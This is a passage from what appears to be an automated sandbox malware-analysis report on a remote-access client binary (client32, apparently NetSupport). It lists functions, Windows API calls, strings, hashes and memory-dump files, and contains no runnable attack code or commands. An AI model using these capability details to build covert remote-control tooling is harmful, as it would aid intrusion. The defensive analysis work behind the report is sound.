                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strncmp$FileWrite
                                                                                                • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                • API String ID: 1635020204-3154135529
                                                                                                • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                                • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                                • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                                • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                                Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                                • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                                • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                                • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                                • PostMessageA.USER32 ref: 110274F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Item$ClassMessageNamePostTextWindow
                                                                                                • String ID: #32770$Tapiexe
                                                                                                • API String ID: 3170390011-3313516769
                                                                                                • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                                • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                                • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                                • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                                Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItemTextA.USER32 ref: 110233C2
                                                                                                  • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                                • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                                • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                                • SetFocus.USER32 ref: 11023417
                                                                                                • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1605826578-1986719024
                                                                                                • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                                • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                                Function 69CE5F20 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 68sleepwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSleepVersionwsprintf
                                                                                                • String ID: *LineSpeed$Limit transmission speed to %d bps?$NetSupport$_Debug
                                                                                                • API String ID: 1064562911-2508291834
                                                                                                • Opcode ID: bd72269edf071e76bb9c985e48eb0691b81fbc19e7ab098a844548e8b85de6de
                                                                                                • Instruction ID: d4c4cfbc85170497fbe999a7e46ec2e91a87d06ccbedf5391c27f03f52861bc7
                                                                                                • Opcode Fuzzy Hash: bd72269edf071e76bb9c985e48eb0691b81fbc19e7ab098a844548e8b85de6de
                                                                                                • Instruction Fuzzy Hash: 6221E4B1D011589BEF04DFA4DE69B5D73B8EF45318F5041B9EB0AAB580E7309D44CB50
                                                                                                Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 74472576-4108050209
                                                                                                • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                                Function 69D19FC7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • UnDecorator::UScore.LIBCMT ref: 69D19FD1
                                                                                                • DName::DName.LIBCMT ref: 69D19FDD
                                                                                                  • Part of subcall function 69D17CA8: DName::doPchar.LIBCMT ref: 69D17CD9
                                                                                                • UnDecorator::getScopedName.LIBCMT ref: 69D1A01C
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A026
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A035
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A041
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A04E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                • String ID: void
                                                                                                • API String ID: 1480779885-3531332078
                                                                                                • Opcode ID: b13e8b6c6da2c015f102a824cb8661f9d3ab844279846f8a8a5a2b626162f351
                                                                                                • Instruction ID: 752a9eac3cd1b30cac5c4eefb27c3056019ac96b15d7b68ec65dc5eba774c1ad
                                                                                                • Opcode Fuzzy Hash: b13e8b6c6da2c015f102a824cb8661f9d3ab844279846f8a8a5a2b626162f351
                                                                                                • Instruction Fuzzy Hash: A511C677908104EFD709CF64E955FAD7BB0AF01314F4480B5D0069B6B5DB30DA49C761
                                                                                                Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                                • String ID:
                                                                                                • API String ID: 1094208222-0
                                                                                                • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                                • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                                Function 11043240 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 244COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • _memset.LIBCMT ref: 110433A9
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$__wcstoi64_memset
                                                                                                • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                                • API String ID: 3760389471-710950153
                                                                                                • Opcode ID: a4a48406d0813789af030b6d0da3969e719553fd5b853badafc9dea947eccc83
                                                                                                • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                                • Opcode Fuzzy Hash: a4a48406d0813789af030b6d0da3969e719553fd5b853badafc9dea947eccc83
                                                                                                • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                                Function 69CF13C9 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF141D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1678
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF16C8
                                                                                                • std::exception::exception.LIBCMT ref: 69CF1740
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF175B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: END_REC$MORE$RESULT$b
                                                                                                • API String ID: 285166177-3141901015
                                                                                                • Opcode ID: 9e114797c7fb8699f24d12db97be72ec9d86b67f03547b554ef9d367caa6b6d9
                                                                                                • Instruction ID: 08ba2066f33fe0a8c4dce911de0aafd760de14825bfebe36db83c92e673bc7b6
                                                                                                • Opcode Fuzzy Hash: 9e114797c7fb8699f24d12db97be72ec9d86b67f03547b554ef9d367caa6b6d9
                                                                                                • Instruction Fuzzy Hash: 378190F5C012599BDF90DFA4AC80AEEB6B4FF04208F44557AE10AA6240F7314B9ACB56
                                                                                                Function 69CE6DF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE6DFD
                                                                                                • #16.WSOCK32(69CEA730,?,00000001,00000000,?,69CEA730,?,00002000,,?,69CEACF4,00000000,00000000,?,?), ref: 69CE6E4C
                                                                                                • WSASetLastError.WSOCK32(00002747,?,69CEA730,?,00002000,,?,69CEACF4,00000000,00000000,?,?,?,00001001,?,00000004), ref: 69CE6F25
                                                                                                • WSASetLastError.WSOCK32(00002745,69CEA730,?,00000001,00000000,?,69CEA730,?,00002000,,?,69CEACF4,00000000,00000000,?,?), ref: 69CE6F36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_memset
                                                                                                • String ID: $Content-Length:$HTTP/
                                                                                                • API String ID: 536390146-1146010681
                                                                                                • Opcode ID: 76906bdc81f43b88cda9fbfde32d0f1fe6613a81202c28bc6ff5a28b6afa9553
                                                                                                • Instruction ID: 52bc1e8d2fa8cc25534800ebdf9e346967c00442c4578015092e8321f214fcae
                                                                                                • Opcode Fuzzy Hash: 76906bdc81f43b88cda9fbfde32d0f1fe6613a81202c28bc6ff5a28b6afa9553
                                                                                                • Instruction Fuzzy Hash: 403124B6A64B012BE701CF64FF65B6B32686F51389F009038FF1A876C1FB31D10581A1
                                                                                                Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • PackedCatalogItem, xrefs: 110156E2
                                                                                                • %012d, xrefs: 11015674
                                                                                                • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                • NSLSP, xrefs: 11015708
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: QueryValue_memsetwsprintf
                                                                                                • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                • API String ID: 1333399081-1346142259
                                                                                                • Opcode ID: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
                                                                                                • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                • Opcode Fuzzy Hash: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
                                                                                                • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                Function 69D00F90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69D00D40: LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 69D00D48
                                                                                                  • Part of subcall function 69D00D40: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D5B
                                                                                                  • Part of subcall function 69D00D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-69D2CB4C,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D76
                                                                                                  • Part of subcall function 69D00D40: _free.LIBCMT ref: 69D00D84
                                                                                                  • Part of subcall function 69D00D40: _malloc.LIBCMT ref: 69D00D8C
                                                                                                  • Part of subcall function 69D00D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,00001001,?,00000004,?,00000000), ref: 69D00D9F
                                                                                                  • Part of subcall function 69D00D40: _free.LIBCMT ref: 69D00DAF
                                                                                                  • Part of subcall function 69D00970: LoadLibraryA.KERNEL32(ws2_32.dll), ref: 69D009A6
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 69D009C3
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 69D009CD
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,socket), ref: 69D009DB
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,closesocket), ref: 69D009E9
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 69D009F7
                                                                                                  • Part of subcall function 69D00970: FreeLibrary.KERNEL32(00000000), ref: 69D00A6C
